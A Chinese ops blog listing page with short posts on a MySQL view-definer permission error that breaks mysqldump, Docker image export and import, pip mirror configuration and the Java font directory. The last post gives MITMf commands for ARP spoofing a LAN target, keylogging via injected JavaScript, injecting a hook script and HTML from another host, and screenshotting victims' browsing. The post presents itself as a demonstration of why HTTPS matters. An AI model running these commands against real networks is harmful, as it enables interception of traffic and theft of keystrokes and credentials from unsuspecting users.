Rootop 服务器运维与web架构

2018-10-19
发表者 Venus
关于mysql视图运维过程中的注意事项已关闭评论

关于mysql视图运维过程中的注意事项

# 今天遇到的问题
mysql备份脚本无法备份,提示错误不能锁表:

mysqldump: Got error: 1045: Access denied for user 'xxx'@'%' (using password: YES) when using LOCK TABLES

在发现问题的前一天删过一个历史遗留账号(备份脚本之前一直是运行正常的)。

在备份脚本加入 --skip-lock-tables 参数不锁表备份,提示错误:
mysqldump: Couldn't execute 'SHOW FIELDS FROM `vm_dataforradarshow`': SELECT command denied to user ''@'%' for column 'prodId' in table '表名已删除' (1143)

排错:
把 SHOW FIELDS FROM `vm_dataforradarshow` 语句放到sql中执行,也报错。这个 vm_dataforradarshow 是一个视图,忽然想起来,视图是有权限的。
里面会包含了是哪个用户创建的,并且在执行视图的时候会用这个用户去执行,结果用户昨天被删掉了,自然执行失败。备份脚本也备份失败。
(因为用的阿里云rds,也怀疑过用户权限问题,创建了一个高权限账号(相当于root),也是备份失败。)

之前遇到的一个问题:
测试环境数据库是user1账户,创建视图也是用user1去创建的。
到正式上,是一个独立的普通用户,比如user2,结果导入sql脚本一直失败,具体错误提示忘记了。
只要把sql脚本里,视图中的user1修改成user2才解决。

避免:
1、开发过程中尽量避免视图使用,毕竟要多耗费一次时间及系统资源。
2、开发测试环境要和正式一致,避免出现我这种账号问题。

 

2018-10-17
发表者 Venus
docker容器及镜像的导出导入已关闭评论

docker容器及镜像的导出导入

1、容器导出导入
# 容器导出为镜像文件
格式为 docker export -o 文件名 容器名
如:
docker export -o aaa.tar aaa

将aaa.tar复制到另一台机器,可以将其导入为镜像。
# 导入镜像文件,并指定镜像名字
格式为 docker import 文件名 镜像名
如:
docker import aaa.tar aaa

2、镜像导出导入
# 导出镜像为文件
格式为 docker save -o 保存镜像文件名 原镜像名
如:
docker save -o aaa.tar aaa

# 导入镜像
格式为 docker load < 镜像文件名
如:
docker load < aaa.tar

2018-10-16
发表者 Venus
配置pip install 安装加速已关闭评论

配置pip install 安装加速

官方下载速度太慢。可以换成国内镜像地址。
临时方法,通过-i参数指定镜像地址(这里用清华大学的)。

临时方法如:

pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

永久方法:

linux下,创建 ~/.pip/pip.conf配置文件,内容如下:

[global]
index-url = https://pypi.tuna.tsinghua.edu.cn/simple

windows下,在C:\Users\你的当前用户名 目录下创建pip目录,然后创建 pip.ini,内容如下

[global]
index-url = https://pypi.tuna.tsinghua.edu.cn/simple

 

2018-10-16
发表者 Venus
java 字体目录已关闭评论

java 字体目录

java字体目录在jdk目录下。

如:/usr/local/jdk/jre/lib/fonts

可以将windows下的字体文件(*.ttf)上传到此目录,供java程序调用。

2018-10-15
发表者 Venus
MITMf流量劫持命令笔记已关闭评论

MITMf流量劫持命令笔记

目的:论https重要性。
安装文档参考:
https://github.com/byt3bl33d3r/MITMf/wiki/Installation

# 图片翻转180度

python mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.1 --targets 192.168.1.115 --upsidedownternet

# 记录键盘

python mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.115 --jskeylogger

# 注入js

python mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.115 --inject --js-url http://192.168.10.11:8999/hook.js

# 注入html

python mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.115 --inject --html-url http://192.168.10.11:8999/a.html

# 截屏

python mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.1 --screen